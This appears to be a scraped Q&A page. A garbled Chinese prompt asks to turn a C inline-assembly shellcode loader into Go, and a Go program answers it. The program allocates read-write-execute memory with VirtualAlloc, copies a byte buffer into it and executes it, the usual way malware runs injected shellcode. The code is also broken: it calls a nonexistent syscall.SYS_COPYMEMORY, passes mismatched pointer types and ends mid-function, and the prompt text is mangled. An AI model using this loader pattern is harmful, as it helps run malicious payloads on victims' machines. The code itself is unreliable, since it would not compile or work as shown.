将下面的代码转换成go语言内联汇编加载使用内联汇编只能加载32位程序的ShellCode因为64位程序不支持写内联汇编#pragma commentlinker sectiondataRWE 将data段的内存设置成可读可写可执行#include WindowshShellCode部分unsigned char buf =xffxd5;void main __asm lea eaxb
package main
import ( "syscall" "unsafe" )
var ( kernel32 = syscall.NewLazyDLL("kernel32.dll") virtualAlloc = kernel32.NewProc("VirtualAlloc") )
func main() { buf := []byte{0xff, 0xd5}
addr, _, _ := virtualAlloc.Call(0, uintptr(len(buf)), 0x1000|0x2000, 0x40)
memcpy(addr, unsafe.Pointer(&buf[0]), uintptr(len(buf)))
syscall.Syscall(addr, 0, 0, 0, 0)
}
func memcpy(dst, src unsafe.Pointer, size uintptr) { syscall.Syscall6(syscall.SYS_COPYMEMORY, uintptr(dst), uintptr(src), size, 0, 0, 0)
原文地址: https://www.cveoy.top/t/topic/hN6B 著作权归作者所有。请勿转载和采集!